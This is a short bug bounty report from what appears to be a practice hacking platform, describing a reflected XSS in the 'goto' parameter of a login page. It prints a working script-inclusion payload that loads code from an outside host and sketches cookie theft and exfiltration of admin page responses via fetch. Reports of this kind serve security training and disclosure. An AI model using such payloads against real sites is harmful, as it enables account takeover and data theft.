FirstBlood-#209Rxss leads to ato accountakeover
This issue was discovered on FirstBlood v1.0.0



On 2021-05-12, prob_hakz Level 2 reported:

bug

rxss

visit http://firstbloodhackers.com:49571/login.php?goto=%22%3E%3Cscript/src=//14.rs%3E

impact

I have written a detailed report here of the impact of this short xss payload which is script inclusion https://www.bugbountyhunter.com/hackevents/report?id=200

In the above payload it is just only alert

But we can do what ever we want like phishing, key stroke logging, account takeover by cookie stealing becuase there is no http only tag for cookie and can also able to steal appointments and entire source code with small snippets with ajax snippets fetch('//drpanel/index.php') and stealing the response and also for fetch('/drpanel/cancelled.php') and steling thre response with the .thenresponse =>response.text().then`data => console.log(data) why this fetch request work means becuase it is giviing ajax query to its own endpoints and so it work smoothly

so it would be any easy attack

The site accepting any script there is no cors here which made this attack possible

Becuase of script inclusion we can entirely attack the site as a bit attacker . tq for the hackevent sean

P3 Rejected

Endpoint: /login.php?goto

Parameter: goto

Payload: "><script/src=//14.rs>